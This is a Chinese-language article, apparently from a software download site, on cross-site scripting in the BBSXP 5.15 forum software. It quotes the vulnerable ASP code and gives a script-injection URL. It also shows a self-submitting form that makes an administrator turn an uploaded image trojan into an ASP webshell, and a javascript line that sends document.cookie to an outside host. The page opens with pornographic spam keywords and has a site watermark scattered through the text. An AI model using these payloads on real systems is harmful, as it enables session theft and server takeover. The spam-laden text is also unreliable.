久久无码高潮喷水抽搐,极品馒头泬19p,久久人人爽精品玩人妻av,精品国产成人国产在线视,精品视频一区二区三区在线观看

簡單分析Script腳本跨站攻擊漏洞技術(shù)

您當(dāng)前位置:首頁 > 紅訊頻道 > 網(wǎng)絡(luò)技術(shù)

  • 紅軟基地 推薦
  • 2012-01-19

  所謂跨站漏洞呢?其實(shí)這和現(xiàn)在比較熱門的SQL注入的原理有異曲同工之處,都是由于程序員在寫程序的時候?qū)σ恍┳兞繘]有做充分的過濾,或者沒做任何的過濾就直接把用戶提交的數(shù)據(jù)送到SQL語句里執(zhí)行,這樣導(dǎo)致了用戶所提交的一些特意構(gòu)造的語句 一般都是帶有象JAVAScript等這類腳本代碼,這樣在服務(wù)里一旦被執(zhí)行就形成了所謂的跨站攻擊了。一般來說對于人機(jī)交互行比較高的程序,比如論壇,留言版這類程序都比較容易存在跨站script攻擊。 xnc紅軟基地

   如何判斷一個程序是否存在跨站漏洞呢?分析程序是最直接的方法了,比如最近搞的很火的BBSXP5.15的跨站 xnc紅軟基地

  漏洞,因?yàn)橛写笪r已經(jīng)詳細(xì)的介紹了,偶也就不在詳述了,簡單的說一下在cookies.asp文件里有這么一句 xnc紅軟基地

  Response.Cookies("skins")=""&Request("no")&""然后在setup.asp里 xnc紅軟基地

  response.write "<html><head><meta http-equiv=Content-Type content=text/html;charset=gb2312></head> xnc紅軟基地
<link href=images/skins/"&Request.Cookies("skins")&"/bbs.css rel=stylesheet><script src=inc/BBSxp.js></script> xnc紅軟基地
<script src=inc/ybb.js></script><script src=images/skins/"&Request.Cookies("skins")&"/bbs.js></script>" 
xnc紅軟基地

  我們可以看到,只要構(gòu)造符合條件的skin的NO,然后在閉合前面的一個"<"接著就可以在后面加上我們的<script腳本了xnc紅軟基地

  比如:  http://xxx.xxxx.xxx/cookies.asp?menu=skins&no=4><script>document.write(’<IFRAME marginWidth=100 marginHeight=100 src="http://www.baidu.com"frameBorder=100width=0scrolling=noheight=0to ... gin="0"></IFRAME>’);</script><script>   xnc紅軟基地

  這樣提交就可以達(dá)到我們的跨站目的了,(這個我動畫里已經(jīng)有演示了)xnc紅軟基地

  而跟深一層的利用,我們則可以構(gòu)造表單,迷惑管理員點(diǎn)我們的帖子,或者聯(lián)接。比如我們構(gòu)造xnc紅軟基地

  http://127.0.0.1/bbsxp/page2.asp?username=<body onload="javascript:document.forms[0].submit()">xnc紅軟基地

  <form action="http://127.0.0.1/bbsxp/admin_fso.asp?menu=bakbf" method="post"> xnc紅軟基地
<input value="/UploadFile/2005-5/200512365.jpg" name="yl" > xnc紅軟基地
<input value="database/haha.asp" name="bf" > xnc紅軟基地
</body></html> xnc紅軟基地
/UploadFile/2005-5/200512365.jpg xnc紅軟基地
這是你的ASP圖片木馬xnc紅軟基地

  這樣我們就如果讓管理員瀏覽了我們的留言,那么這個腳本就會自動把/UploadFile/2005-5/200512365.jpgxnc紅軟基地

  備份成database/haha.asp。我們也就有了可愛的webshell了。而為什么要管理員瀏覽才有效呢?因?yàn)榉⻊?wù)器上是存在cookies和session機(jī)制的xnc紅軟基地

  而session其實(shí)是在服務(wù)器端的tmp目錄下的某一個文件中為每個用戶儲存一些變量,對session的操作其實(shí)是對文件讀寫操作。xnc紅軟基地

  seesion是每個用戶都有自己的session。他們的生命周期一般是用戶打開某網(wǎng)站瀏覽器到關(guān)閉與次網(wǎng)站連接所xnc紅軟基地

  有的瀏覽器后結(jié)束。cookie這是在用戶端的存貯機(jī)制,他需要用戶的打開cookie支持,所以只有管理才有權(quán)利把我們JPG備份在ASP xnc紅軟基地
     xnc紅軟基地
  現(xiàn)在大家用的比較常見的就是盜取cookies而后欺騙,或者利用社會工程學(xué)進(jìn)一步入侵比如我們構(gòu)造下面的腳本代碼就可以盜取用戶cookies了 xnc紅軟基地

  javascript:window.open(‘http://xxx.xxx.xxx/cookies.asp?msg=’+document.cookie)xnc紅軟基地

xnc紅軟基地

來源:紅訊頻道

專題合集 | 手機(jī)游戲 | 最近更新 | 下載排行 | 提交軟件 | 在線病毒掃描 | 聯(lián)系我們 | 版權(quán)聲明 | 網(wǎng)站地圖
Copyright ©2006-2013 紅軟基地(www.piola.cn). 湘ICP備2024053236號-1